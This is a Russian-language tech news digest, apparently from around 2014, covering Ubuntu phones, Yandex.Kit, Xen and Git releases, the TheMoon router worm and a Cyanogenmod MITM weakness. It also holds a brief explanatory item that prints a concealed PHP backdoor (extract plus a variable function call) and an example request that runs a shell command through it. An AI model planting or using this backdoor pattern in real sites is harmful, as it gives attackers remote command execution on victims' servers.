Компания Canonical официально представила первых производителей смартфонов на базе мобильной платформы Ubuntu Touch. Первые модели смартфонов будут выпущены компаниями BQ Mobile (Испания) и Meizu (Китай). При этом, обе компании будут продавать устройства по всему миру через организацию заказов в online, в том числе устройство можно будет заказать с сайта Ubuntu.com. Кроме того, в анонсе упоминается достижение соглашений с 16 крупными сотовыми операторами, среди которых Vodafone, EE, T-Mobile USA, Deutsche Telekom, Verizon, Telstra и Portugal Telecom, которые готовы продавать своим абонентам смартфоны с Ubuntu. Точная дата начала продаж и ориентировочная стоимость устройств будет объявлена 26 февраля на конференции Mobile World Congres. … Читать далее Официально представлены первые производители смартфонов на базе Ubuntu

Компания Яндекс представила Yandex.Kit, собственный вариант прошивки на базе платформы Android, отличающийся оптимизацией для русскоязычных пользователей и тесной интеграцией с сервисами компании (поиск, карта, почта, диск и т.п.). Вместо привязки с аккаунту Google в Yandex.Kit осуществляется привязка к аккаунту пользователя в Yandex, в качетсве каталога-магазина предустановлен Яндекс.Store (Google Play не поддерживается). Первые смартфоны с прошивкой Yandex.Kit будут выпущены компаниями Huawei и Explay, и поступят в продажу уже весной этого года. Наиболее интересным улучшением является переработанная адресная книга, в которой добавлены средства для определения неизвестного номера в справочнике организаций, поддержка поиска телефона по названию компании, гибкие средства поиска по разным формам … Читать далее Компания Яндекс подготовила собственную прошивку на базе платформы Android

В свете появления спекуляций в отношении привязки GNOME к специфичным возможностям Linux и принуждения к использованию systemd, Маттиас Класен (Matthias Clasen), лидер Fedore Desktop Team и участник GNOME Release Team, пояснил позицию проекта в области портирования на различные системы. Маттиас решительно отвергает, что GNOME не принимает во внимание вопрос переносимости. Маттиас признаёт, что GNOME в основном ориентируется при разработке на обеспечение работы на современных Linux-системах и стремится использовать технологии, которые лучше всего подходят для решения возникающих задач, что, в частности, и приводит к расширению поддержки сервисов systemd, многие из которых являются прямыми потомками ранее используемых механизмов, поставляемых с gnome-settings-daemon. Но, … Читать далее Позиция GNOME в отношении работы на платформах, отличных от Linux

Доступны корректирующие обновления свободного гипервизора Xen — 4.3.2 и 4.2.4, в которых отмечено устранение 14 и 23 уязвимостей, а также исправление порции ошибок, влияющих на стабильность работы. Большинство уязвимостей позволяют инициировать крах или зависание хост-системы из гостевого окружения. Тем не менее, среди уязвимостей имеются 4 проблемы, для которых не исключено повышение привилегий пользователя внутри гостевой системы, а также 3 проблемы, которые потенциально позволяют администратору гостевой системы получить доступ к окружению хост-системы. Читать далее Обновление Xen 4.3.2 и 4.2.4 с устранением уязвимостей

Компания NVIDIA выпустила обновление проприетарного драйвера NVIDIA 331.49, относящегося к категории стабильных веток с длительным сроком поддержки. Драйвер доступен для Linux (ARM, x86, x86_64), FreeBSD (x86, x86_64) и Solaris (x86_64). В новой версии добавлена поддержка GPU GeForce GT 710 и GeForce 825M. В конфигурацию X-сервера добавлена опция «InbandStereoSignaling» для включения/выключения стереосигналов через DisplayPort. Добавлена экспериментальная поддержка визуализации ARGB GLX при одновременном включении композитного режима и Xinerama в X.Org xserver 1.15. Читать далее Выпуск проприетарного драйвера NVIDIA 331.49

Исследователи безопасности обратили внимание на использование незашифрованного HTTP-соединения при проверке наличия обновлений и загрузке zip-файлов программой для установки обновлений для свободной Android-прошивки Cyanogenmod в сочетании с отсутствием верификации загруженных данных по цифровой подписи или контрольной сумме, отдельно получаемой из надёжных источников (контрольная сумма также передаётся по HTTP). Подобная недоработка позволяет организовать MITM-атаку по подмене загружаемого файла на одном из транзитных узлов, через который проходит трафик пользователя. В настоящее время разработчики Cyanogenmod уже обеспечили возможность ручной загрузки обновлений через HTTPS, но доступ к API при проверке обновлений по-прежнему производится через HTTP. В качестве примера атаки по установке подставного обновления, продемонстрирована возможность … Читать далее Система обновления Cyanogenmod подвержена совершению MITM-атак

Представлен новый выпуск популярной утилиты для организации поиска данных в текстовых файлах — GNU Grep 2.17. Наиболее существенным улучшением является проведение заметной оптимизации производительности. Кроме того, в выпуске grep 2.17 прекращена поддержка опции «—mmap», которая давно была переведена в категорию устаревших. При использовании многобайтовых локалей поиск без учёта регистра через «grep -i» по простому шаблону, не содержащему символов » и ‘[‘, теперь выполняется в десять раз быстрее. Поиск с учётом регистра (без опции «-i») для многобайтовых локалей в новом выпуске выполняется в семь раз быстрее при наличии в тексте большого числа совпадений. Читать далее В grep 2.17 кардинально увеличена скорость работы с многобайтовыми кодировками

В декабре группа немецких исследователей сообщила об успешном создании прототипа системы обмена данными между двумя ноутбуками при помощи звукового канала связи, организованного в неслышимом диапазоне частот. Реализация данной системы так и не была открыта, поэтому несколько энтузиастов добились проведения похожего эксперимента используя свободный пакет GNU Radio для цифровой обработки и генерации сигналов. Подготовленный в ходе работы набор патчей к GNU Radio и сценарий проведения эксперимента опубликованы на GitHub. Представленные наработки позволяют организовать TCP/IP туннель между двумя рядом стоящими ноутбуками, используя для передачи данных штатные микрофоны и громкоговорители ноутбуков. Для организации канала связи используется близкий к ультразвуковому диапазон частот, не слышимый … Читать далее Опубликован код для организации передачи данных между ноутбуками в ультразвуковом диапазоне

Объявлено о проведении новой акции «Humble Indie Bundle«, в рамках которой пользователь может получить комплект из 6 многоплатформенных игр в обмен на пожертвование проекту любой суммы. Распространяемые в рамках акции могут работать на платформах Mac OS X, Windows и Linux. В пакет входят следующие игры: Guacamelee! Gold Edition, Dust: An Elysian Tail, The Swapper, Giana Sisters: Twisted Dreams, Antichamber и Monaco: What’s Yours is Mine (две последние игры доступны только перечислившим от $3.84). На момент написания новости собрано уже около 100 тыс. долларов. Средний размер суммы взноса составил $3.84. Средний размер взноса пользователей Linux систем составил $5.29, Mac OS X … Читать далее Одиннадцатая акция Humble Indie Bundle по распространению комплекта игр

Выявлен заслуживающий внимания PHP-бэкдор, активация которого производится без видимого обращения к таким функциям, как «eval», «exec», «system», «assert» и «preg_replace». Вместо явного указания eval и других сразу вызывающих подозрение функций, при установке бэкдора в файле phpinfo.php появляется несколько на первый взгляд неопасных строк: @extract ($_REQUEST); @die ($ctime($atime)); При более вдумчивом просмотре становится ясно, что при помощи функции extract осуществляется создание переменных на основании данных, переданных в составе запроса GET или POST. Конструкция $ctime($atime) по сути является вызовом функции, имя которой хранится в переменной $ctime. Сформировав запрос «/phpinfo.php?ctime=systematime=ls -la» получим вызов функции system() с аргументом «ls -la». Читать далее Необычный способ организации вызова PHP-бэкдора

Разработчики файловых менеджеров столкнулись с появлением в Android 4.4 (KitKat) новых ограничений на доступ приложений, имеющих полномочия WRITE_EXTERNAL_STORAGE, к внешним накопителям. Отныне возможность полного доступа ограничена только первичным накопителем и не применима ко вторичным. Изменение касается только устройств с двойным хранилищем, в которых в роли первичного накопителя выступает встроенная Flash-память, а вторичного — SD-карта. С практической стороны, подобное ограничение не позволяет реализовать полный контроль над SD-картой, например, при использовании непривилегированного файлового менеджера невозможно удалить или записать произвольные данные на SD-карту. Системные приложения могут организовать запись на вторичные накопители при наличии полномочий WRITE_MEDIA_STORAGE, которые не выдаются для пользовательских программ, устанавливаемых из … Читать далее Google ограничил в Android доступ сторонних приложений к внешней SD-карте

По заявлению компании Dell, пользователь может лишиться гарантии на встроенные громкоговорители ноутбуков, если в системе установлен медиапроигрыватель VLC. Причиной подобного шага является наличие в VLC штатной возможности установки громкости, превышающего номинальный уровень. По мнению Dell, установка в VLC завышенного уровня звука может привести к выходу громкоговорителей из строя. Разработчики VLC исключают такую возможность и считают отказ гарантийного восстановления повреждённого громкоговорителя формальным поводом, так как для вывода звука в VLC используется штатный API, не позволяющий превысить номинальный уровень громкости, а усиление производится лишь на уровне декодирования, т.е. виртуально повышается громкость контента, закодированного с пониженным уровнем громкости. В качестве реальной причины называется … Читать далее Использование VLC может привести к потере гарантии на громкоговорители ноутбуков Dell

Разработчики свободного антивирусного пакета ClamAV представили новую упрощённую программу приёма вирусных сигнатур от представителей сообщества. Для приёма сигнатур создан отдельный список рассылки community-sigs, в который достаточно отправить подготовленную сигнатуру, краткое описание и MD5/SHA1/SHA256 хэш примера вредоносного кода для которого подготовлена сигнатура. Непосредственно вредоносное ПО, определяемое сигнатурой, следует отправить отдельно, через специальную форму на сайте. После проверки и возможной доработки для соответствия требованиям проекта сигнатура будет добавлена в антивирусную базу. Читать далее Представлена программа по привлечению сообщества к созданию вирусных сигнатур для ClamAV

Исследователи безопасности обратили внимание на использование незашифрованного HTTP-соединения при проверке наличия обновлений и загрузке zip-файлов программой для установки обновлений для свободной Android-прошивки Cyanogemod в сочетании с отсутствием верификации загруженных данных по цифровой подписи или контрольной сумме, отдельно получаемой из надёжных источников (контрольная сумма также передаётся по HTTP). Подобная недоработка позволяет организовать MITM-атаку по подмене загружаемого файла на одном из транзитных узлов, через который проходит трафик пользователя. В настоящее время разработчики Cyanogemod уже обеспечили возможность ручной загрузки обновлений через HTTPS, но доступ к API при проверке обновлений по-прежнему производится через HTTP. В качестве примера атаки по установке подставного обновления, продемонстрирована возможность … Читать далее Система обновления Cyanogemod подвержена совершению MITM-атак

Проект UALinux представил Ubuntu CyberPack (ALF) 1.0 (Analysis, Logging, Forensics), специализированную Live-сборку Ubuntu Linux с подборкой приложений для выявления скрытых данных, получения и фиксации цифровых доказательств и проведения криминалистического анализа. Дистрибутив позволяет выполнять такие действия, как выявление скрытых и удаленных данных, сбор доказательств по использованию ПК для совершения правонарушений, протоколирование произведенных при осмотре действий. Размер iso-образа 819 Мб. Дистрибутив основан на пакетной базе Ubuntu 12.04.4 и поставляется с пользовательской оболочкой на основе LXDE. Поддерживается работа с различными файловыми системами (ext2/3/4, NTFS, FAT/32, VFAT, exFAT, XFS, BtrFS, UFS, ReiserFS/4, HFS/+, ZFS и д.п), разделами RAID и LVM. По умолчанию все обнаруженные … Читать далее Ubuntu CyberPack (ALF) 1.0

В процессе декомпиляции развиваемой компанией Valve античитерской системы Steam VAC (Valve Anti-Cheat) выявлен факт грубого нарушения приватности, выражающийся в отправке на внешний сервер md5-хешей доменов, к которым обращался пользователь (отправляется содержимое кэша DNS). Проблема выявлена в Windows-версиях системы (содержимое кэша DNS в Windows можно посмотреть командой «ipconfig /displaydns»). В Linux доступ к кэшу DNS зависит от типа применяемого на локальной системе кэширующего сервера (dnsmasq, nscd, bind) и возможен только для суперпользователя после включения специальных отладочных режимов. Читать далее В Steam VAC выявлен факт отправки хэшированного содержимого кэша DNS на внешний сервер

Центр противодействия угрозам в Интернет опубликовал предупреждение о выявлении активности сетевого червя TheMoon, поражающего беспроводные маршрутизаторы Linksys (модели Wireless-N и серии E). Используя для проникновения неисправленную уязвимость червь получает управление на устройстве, загружает исполняемый файл ELF для архитектуры MIPS и запускает процесс сканирования сети на предмет выявления других уязвимых устройств и повторения атаки. Сканирование ограничено 670 сетями (/21 и /24) DSL-провайдеров в разных странах. В случае выявления уязвимого устройства, запускается эксплоит и на осуществляющей сканирование системе кратковременно открывается случайный сетевой порт для отдачи копии бинарного файла с червём. После того как файл загружен, порт закрывается. В файле с червём также … Читать далее Выявлен червь, поражающий неисправленную уязвимость в маршрутизаторах Linksys

Объявлено о переводе актуальной кодовой базы FreeBSD-CURRENT на Clang 3.4 и новые версии сопутствующих библиотек и компонентов LLVM 3.4. Выпуск Clang 3.4 примечателен реализацией всех возможностей чернового варианта будущего стандарта C++1y и существенным увеличением производительности генераторов кода. Сообщается, что добавленные в LLVM 3.4 улучшения позволяют начать интеграцию Clang для дополнительных архитектур FreeBSD, таких как powerpc, mips и arm64. Пользователям и мэйнтейнерам портов рекомендует обратить внимание на более жесткий контроль опций: некоторые ранее игнорируемые флаги, которые не удалось распознать (например, специфичные для GCC опции для тонкой настройки режимов оптимизации), теперь могут привести к выводу ошибки. Читать далее Clang 3.4 интегрирован в кодовую базу FreeBSD

Доступен релиз распределенной системы управления исходными текстами Git 1.9.0. Скачок в нумерации версии связан с внесением изменений, нарушающих обратную совместимость. Более существенные нарушения совместимости, связанные с изменением поведения команд «git puth» и «git add», отложены до выпуска Git 2.0. Git является одной из самых эффективных, надёжных и высокопроизводительных систем управления версиями, предоставляющей гибкие средства нелинейной разработки, базирующиеся на ответвлении и слиянии веток. Для обеспечения целостности истории и устойчивости к изменениям задним числом используются криптографические методы, также возможна привязка цифровых подписей разработчиков к тегам и коммитам. Из проектов, разрабатываемых с использованием Git, можно отметить ядро Linux, Android, Libreoffice, Systemd, X.Org, Wayland, … Читать далее Релиз распределенной системы управления исходными текстами Git 1.9.0

Разработчики свободной операционной системы ReactOS, нацеленной на обеспечение совместимости с программами и драйверами Microsoft Windows семейства NT (XP/2003/Vista), рассказали об успехах в разработке нового главного меню, работающего в стиле меню Windows 7. Новая реализация меню базируется на классе CMenuSite, обеспечивающем прослойку для обмена событиями и сообщениями между базовым меню и вторичными раскрывающимися блоками. Читать далее Прогресс в разработке нового главного меню ReactOS

Увидела свет биллинг-система Carbon Billing 5.1, которая ознаменовала доведение новой ветки до готовности для поставки в форме коробочного продукта. Carbon Billing 5 представляет собой модульный биллинг, поставляющийся в виде дистрибутива Linux с предварительно настроенными контейнерами приложений. После установки ISO-образа, поставляемого для ахитектуры x86_64, в течение 90 дней система работает в полнофункциональном demo-режиме. Carbon Billing 5 является коммерческим продуктом, но для конфигураций, обслуживающих до 200 пользователей, можно получить бесплатную лицензию на всю жизнь. Системное окружение основано на пакетной базе Linux-дистрибутива CentOS 6.4. В состав входит серия приложений для провайдеров, каждое из которых находится в chroot-окружении. В дальнейшем, для запуска окружений планируется … Читать далее Carbon Billing 5 перешёл на Python и контейнеры (реклама)